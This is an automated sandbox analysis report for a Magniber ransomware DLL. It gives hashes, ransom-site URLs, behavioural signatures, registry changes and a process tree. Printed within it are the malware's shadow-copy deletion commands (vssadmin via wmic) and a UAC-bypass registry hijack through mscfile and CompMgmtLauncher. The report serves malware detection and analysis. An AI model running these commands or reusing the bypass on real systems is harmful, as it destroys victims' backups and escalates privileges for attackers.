Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
102s -
max time network
107s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23/08/2021, 15:14
Static task
static1
Behavioral task
behavioral1
Sample
c17ec37e0515fa380687c26cfb69b4d3.dll
Resource
win7v20210410
Behavioral task
behavioral2
Sample
c17ec37e0515fa380687c26cfb69b4d3.dll
Resource
win10v20210410
General
-
Target
c17ec37e0515fa380687c26cfb69b4d3.dll
-
Size
21KB
-
MD5
c17ec37e0515fa380687c26cfb69b4d3
-
SHA1
44ecf08588032a481dd69f3e94626682b631d0c5
-
SHA256
36417f0ea6d948cbd7e003b3cefbb603d886849a8c80e0999c7969b03f2b9c28
-
SHA512
4895fb9633cf923e937a66fa36f3586dbb178ca94b7df2d5ce8aac82af752a035f85b14ed2aa6714d2d6fdbbb3826c6ad5be95d2a44dbe2e3405cb6ee1bde156
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://e2bcb4e05ed008e00zarkzonn.xurvsjipiyubcsta.onion/zarkzonn
http://e2bcb4e05ed008e00zarkzonn.tankmy.space/zarkzonn
http://e2bcb4e05ed008e00zarkzonn.gorise.uno/zarkzonn
http://e2bcb4e05ed008e00zarkzonn.laygive.site/zarkzonn
http://e2bcb4e05ed008e00zarkzonn.loglook.club/zarkzonn
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1312 1720 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2056 1720 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 1720 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 1720 cmd.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2528 1720 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2536 1720 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2608 1720 vssadmin.exe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2644 1720 vssadmin.exe 45 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\CompressEnter.crw => C:\Users\Admin\Pictures\CompressEnter.crw.zarkzonn taskhost.exe File renamed C:\Users\Admin\Pictures\MoveInstall.png => C:\Users\Admin\Pictures\MoveInstall.png.zarkzonn taskhost.exe File renamed C:\Users\Admin\Pictures\MoveRequest.tif => C:\Users\Admin\Pictures\MoveRequest.tif.zarkzonn taskhost.exe File opened for modification C:\Users\Admin\Pictures\UseUpdate.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\UseUpdate.tiff => C:\Users\Admin\Pictures\UseUpdate.tiff.zarkzonn taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 368 set thread context of 1116 368 rundll32.exe 12 PID 368 set thread context of 1156 368 rundll32.exe 16 PID 368 set thread context of 1176 368 rundll32.exe 15 -
Interacts with shadow copies 2 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2528 vssadmin.exe 2536 vssadmin.exe 2608 vssadmin.exe 2644 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "336496478" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8cf8c6cb3c16047ab632c9e74f04c280000000002000000000010660000000100002000000026e99650a0478344139e337c884020bcb3ffb045a1f450579666ad94df802cd6000000000e80000000020000200000007548ef9fa0c0468b3b1a607e6499931aafe89720ba98447eec424893bc769daf90000000bdd6e3e3685d187f1623902f5c0a89554286af49b0ae23dbd832075c34deb324042673912dcba8babbb00dcb06d94285d4ca38fc531e5417ffa9a1d8e87bbaa609a157c55d6899d114c48c1fd6508c6dfb1a560d77516ff69f9b0d2998ca02c428004f98734d88389e2627abe2715d04ddf04ce8550c6266d381f6ceb3c2f0c6363fa3d4f39e3c927e0c047a2c534eef4000000018e3347bc9996a296cf1128906b29ffff6e2a14581a033b8a48d02c90832f22eb5268fe4c737c1be8ab64d981c254390bfcfb31fcb0e9107a3eacc5912c30bc0 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d01fc9443198d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6C5DFC11-0424-11EC-8528-FAFEA7710D2E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b8cf8c6cb3c16047ab632c9e74f04c28000000000200000000001066000000010000200000009bcfd69d088b7d0798201ee1c64e31cbccd7baf51d1e446d79d2d33dc12aeb84000000000e800000000200002000000090549e0a64daf6a6fb6cf5a1f1374ad07d5bae122c1cc2577cd0c7bced00963f2000000052e5301ade0c2945126e1eb1e8db5896a012985a65d0fc5aba7fb280c5dbf820400000009d940009cde579c8cc07a5fbe694178240a13d14204d5fe0d5afe0a56b03e76cc5a7e0f9a903f7efe0de258f027da3f029cf0051a527b8c0abef2908f6d6869c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command rundll32.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2008 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 368 rundll32.exe 368 rundll32.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 368 rundll32.exe 368 rundll32.exe 368 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1176 Explorer.EXE Token: SeShutdownPrivilege 1176 Explorer.EXE Token: SeIncreaseQuotaPrivilege 2040 WMIC.exe Token: SeSecurityPrivilege 2040 WMIC.exe Token: SeTakeOwnershipPrivilege 2040 WMIC.exe Token: SeLoadDriverPrivilege 2040 WMIC.exe Token: SeSystemProfilePrivilege 2040 WMIC.exe Token: SeSystemtimePrivilege 2040 WMIC.exe Token: SeProfSingleProcessPrivilege 2040 WMIC.exe Token: SeIncBasePriorityPrivilege 2040 WMIC.exe Token: SeCreatePagefilePrivilege 2040 WMIC.exe Token: SeBackupPrivilege 2040 WMIC.exe Token: SeRestorePrivilege 2040 WMIC.exe Token: SeShutdownPrivilege 2040 WMIC.exe Token: SeDebugPrivilege 2040 WMIC.exe Token: SeSystemEnvironmentPrivilege 2040 WMIC.exe Token: SeRemoteShutdownPrivilege 2040 WMIC.exe Token: SeUndockPrivilege 2040 WMIC.exe Token: SeManageVolumePrivilege 2040 WMIC.exe Token: 33 2040 WMIC.exe Token: 34 2040 WMIC.exe Token: 35 2040 WMIC.exe Token: SeShutdownPrivilege 1176 Explorer.EXE Token: SeShutdownPrivilege 1176 Explorer.EXE Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: SeIncreaseQuotaPrivilege 1140 WMIC.exe Token: SeSecurityPrivilege 1140 WMIC.exe Token: SeTakeOwnershipPrivilege 1140 WMIC.exe Token: SeLoadDriverPrivilege 1140 WMIC.exe Token: SeSystemProfilePrivilege 1140 WMIC.exe Token: SeSystemtimePrivilege 1140 WMIC.exe Token: SeProfSingleProcessPrivilege 1140 WMIC.exe Token: SeIncBasePriorityPrivilege 1140 WMIC.exe Token: SeCreatePagefilePrivilege 1140 WMIC.exe Token: SeBackupPrivilege 1140 WMIC.exe Token: SeRestorePrivilege 1140 WMIC.exe Token: SeShutdownPrivilege 1140 WMIC.exe Token: SeDebugPrivilege 1140 WMIC.exe Token: SeSystemEnvironmentPrivilege 1140 WMIC.exe Token: SeRemoteShutdownPrivilege 1140 WMIC.exe Token: SeUndockPrivilege 1140 WMIC.exe Token: SeManageVolumePrivilege 1140 WMIC.exe Token: 33 1140 WMIC.exe Token: 34 1140 WMIC.exe Token: 35 1140 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1176 Explorer.EXE 1572 iexplore.exe 1176 Explorer.EXE 1176 Explorer.EXE 1176 Explorer.EXE 1176 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1176 Explorer.EXE 1176 Explorer.EXE 1176 Explorer.EXE 1176 Explorer.EXE 1176 Explorer.EXE 1176 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1572 iexplore.exe 1572 iexplore.exe 1684 IEXPLORE.EXE 1684 IEXPLORE.EXE 1684 IEXPLORE.EXE 1684 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1116 wrote to memory of 2008 1116 taskhost.exe 26 PID 1116 wrote to memory of 2008 1116 taskhost.exe 26 PID 1116 wrote to memory of 2008 1116 taskhost.exe 26 PID 1116 wrote to memory of 1768 1116 taskhost.exe 27 PID 1116 wrote to memory of 1768 1116 taskhost.exe 27 PID 1116 wrote to memory of 1768 1116 taskhost.exe 27 PID 1116 wrote to memory of 1844 1116 taskhost.exe 28 PID 1116 wrote to memory of 1844 1116 taskhost.exe 28 PID 1116 wrote to memory of 1844 1116 taskhost.exe 28 PID 1844 wrote to memory of 2040 1844 cmd.exe 31 PID 1844 wrote to memory of 2040 1844 cmd.exe 31 PID 1844 wrote to memory of 2040 1844 cmd.exe 31 PID 1156 wrote to memory of 1404 1156 Dwm.exe 33 PID 1156 wrote to memory of 1404 1156 Dwm.exe 33 PID 1156 wrote to memory of 1404 1156 Dwm.exe 33 PID 1176 wrote to memory of 1584 1176 Explorer.EXE 35 PID 1176 wrote to memory of 1584 1176 Explorer.EXE 35 PID 1176 wrote to memory of 1584 1176 Explorer.EXE 35 PID 1768 wrote to memory of 1572 1768 cmd.exe 36 PID 1768 wrote to memory of 1572 1768 cmd.exe 36 PID 1768 wrote to memory of 1572 1768 cmd.exe 36 PID 368 wrote to memory of 412 368 rundll32.exe 37 PID 368 wrote to memory of 412 368 rundll32.exe 37 PID 368 wrote to memory of 412 368 rundll32.exe 37 PID 1404 wrote to memory of 540 1404 cmd.exe 38 PID 1404 wrote to memory of 540 1404 cmd.exe 38 PID 1404 wrote to memory of 540 1404 cmd.exe 38 PID 412 wrote to memory of 1140 412 cmd.exe 42 PID 412 wrote to memory of 1140 412 cmd.exe 42 PID 412 wrote to memory of 1140 412 cmd.exe 42 PID 1584 wrote to memory of 1556 1584 cmd.exe 41 PID 1584 wrote to memory of 1556 1584 cmd.exe 41 PID 1584 wrote to memory of 1556 1584 cmd.exe 41 PID 1572 wrote to memory of 1684 1572 iexplore.exe 46 PID 1572 wrote to memory of 1684 1572 iexplore.exe 46 PID 1572 wrote to memory of 1684 1572 iexplore.exe 46 PID 1572 wrote to memory of 1684 1572 iexplore.exe 46 PID 2024 wrote to memory of 2156 2024 cmd.exe 57 PID 2024 wrote to memory of 2156 2024 cmd.exe 57 PID 2024 wrote to memory of 2156 2024 cmd.exe 57 PID 2056 wrote to memory of 2184 2056 cmd.exe 58 PID 2056 wrote to memory of 2184 2056 cmd.exe 58 PID 2056 wrote to memory of 2184 2056 cmd.exe 58 PID 2088 wrote to memory of 2192 2088 cmd.exe 60 PID 2088 wrote to memory of 2192 2088 cmd.exe 60 PID 2088 wrote to memory of 2192 2088 cmd.exe 60 PID 1312 wrote to memory of 2200 1312 cmd.exe 59 PID 1312 wrote to memory of 2200 1312 cmd.exe 59 PID 1312 wrote to memory of 2200 1312 cmd.exe 59 PID 2184 wrote to memory of 2308 2184 CompMgmtLauncher.exe 61 PID 2184 wrote to memory of 2308 2184 CompMgmtLauncher.exe 61 PID 2184 wrote to memory of 2308 2184 CompMgmtLauncher.exe 61 PID 2156 wrote to memory of 2324 2156 CompMgmtLauncher.exe 63 PID 2156 wrote to memory of 2324 2156 CompMgmtLauncher.exe 63 PID 2156 wrote to memory of 2324 2156 CompMgmtLauncher.exe 63 PID 2192 wrote to memory of 2360 2192 CompMgmtLauncher.exe 65 PID 2192 wrote to memory of 2360 2192 CompMgmtLauncher.exe 65 PID 2192 wrote to memory of 2360 2192 CompMgmtLauncher.exe 65 PID 2200 wrote to memory of 2492 2200 CompMgmtLauncher.exe 67 PID 2200 wrote to memory of 2492 2200 CompMgmtLauncher.exe 67 PID 2200 wrote to memory of 2492 2200 CompMgmtLauncher.exe 67
Processes
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2008
-
-
C:\Windows\system32\cmd.execmd /c "start http://e2bcb4e05ed008e00zarkzonn.tankmy.space/zarkzonn^&1^&59005328^&74^&301^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://e2bcb4e05ed008e00zarkzonn.tankmy.space/zarkzonn&1&59005328&74&301&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1572 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1684
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\c17ec37e0515fa380687c26cfb69b4d3.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1556
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2492
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2308
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2324
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2360
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2528
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2536
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2608
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2644
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2716